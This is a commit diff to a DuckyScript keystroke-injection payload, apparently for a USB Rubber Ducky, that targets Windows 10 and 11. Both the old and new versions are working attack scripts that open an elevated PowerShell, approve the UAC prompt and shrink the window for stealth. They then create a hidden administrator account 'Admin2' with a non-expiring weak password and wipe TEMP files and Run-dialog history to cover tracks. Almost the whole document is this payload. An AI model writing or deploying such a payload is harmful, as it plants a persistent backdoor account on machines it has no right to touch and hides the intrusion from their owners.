Update payload.txt
parent
cd63cd6b2e
commit
68997ce959
|
@ -2,88 +2,41 @@ REM Title: Add_Local_Admin
|
||||||
REM Author: LulzAnarchyAnon
|
REM Author: LulzAnarchyAnon
|
||||||
REM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload
|
REM Description: Administrator PowerShell is opened, and resized for a more stealthy payload delivery, then the payload
|
||||||
REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared.
|
REM creates a local admin account on the target system, afterwards powershell exits, and all history is cleared.
|
||||||
|
REM This lightning fast payload deployed, and was completed in a test run in 10.57 seconds
|
||||||
REM Target: Windows 10 and 11
|
REM Target: Windows 10 and 11
|
||||||
REM Props: Darren Kitchen, and I am Jakoby
|
REM Props: Darren Kitchen, and I am Jakoby
|
||||||
REM Version: 2.0
|
REM Version: 3.0
|
||||||
REM Category: Execution
|
REM Category: Execution
|
||||||
|
|
||||||
DELAY 1000
|
|
||||||
|
DELAY 200
|
||||||
GUI r
|
GUI r
|
||||||
DELAY 500
|
DELAY 200
|
||||||
STRING powershell -Command "Start-Process PowerShell -Verb RunAs"
|
STRINGLN powershell -Command "Start-Process PowerShell -Verb RunAs"
|
||||||
DELAY 500
|
|
||||||
ENTER
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ALT y
|
ALT y
|
||||||
DELAY 1000
|
|
||||||
STRING PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
STRING $Username = "Admin2"
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING $Password = "password"
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING $group = "Administrators"
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING $adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING $existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING if ($existing -eq $null) {
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING Write-Host "Creating new local user $Username."
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING & NET USER $Username $Password /add /y /expires:never
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING Write-Host "Adding local user $Username to $group."
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING & NET LOCALGROUP $group $Username /add
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING }
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING {
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING Write-Host "Setting password for existing local user $Username."
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING $existing.SetPassword($Password)
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING }
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING Write-Host "Ensuring password for $Username never expires."
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
STRING & WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
|
|
||||||
DELAY 1000
|
|
||||||
ENTER
|
|
||||||
DELAY 1000
|
|
||||||
STRING rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
|
||||||
DELAY 500
|
DELAY 500
|
||||||
ENTER
|
STRINGLN
|
||||||
DELAY 500
|
PowerShell.exe -noe -c ". mode.com con: lines=5 cols=12"
|
||||||
STRING reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
$Username = "Admin2"
|
||||||
DELAY 500
|
$Password = "password"
|
||||||
ENTER
|
$group = "Administrators"
|
||||||
DELAY 200
|
$adsi = [ADSI]"WinNT://$env:COMPUTERNAME"
|
||||||
STRING exit
|
$existing = $adsi.Children | where {$_.SchemaClassName -eq 'user' -and $_.Name -eq $Username }
|
||||||
DELAY 200
|
if ($existing -eq $null) {
|
||||||
ENTER
|
Write-Host "Creating new local user $Username."
|
||||||
DELAY 200
|
& NET USER $Username $Password /add /y /expires:never
|
||||||
STRING exit
|
Write-Host "Adding local user $Username to $group."
|
||||||
DELAY 200
|
& NET LOCALGROUP $group $Username /add
|
||||||
ENTER
|
}
|
||||||
|
{
|
||||||
|
Write-Host "Setting password for existing local user $Username."
|
||||||
|
$existing.SetPassword($Password)
|
||||||
|
}
|
||||||
|
Write-Host "Ensuring password for $Username never expires."
|
||||||
|
& WMIC USERACCOUNT WHERE "Name='$Username'" SET PasswordExpires=FALSE
|
||||||
|
rm $env:TEMP\* -r -Force -ErrorAction SilentlyContinue
|
||||||
|
reg delete HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /va /f
|
||||||
|
exit
|
||||||
|
exit
|
||||||
|
END_STRINGLN
|
||||||
|
|
Loading…
Reference in New Issue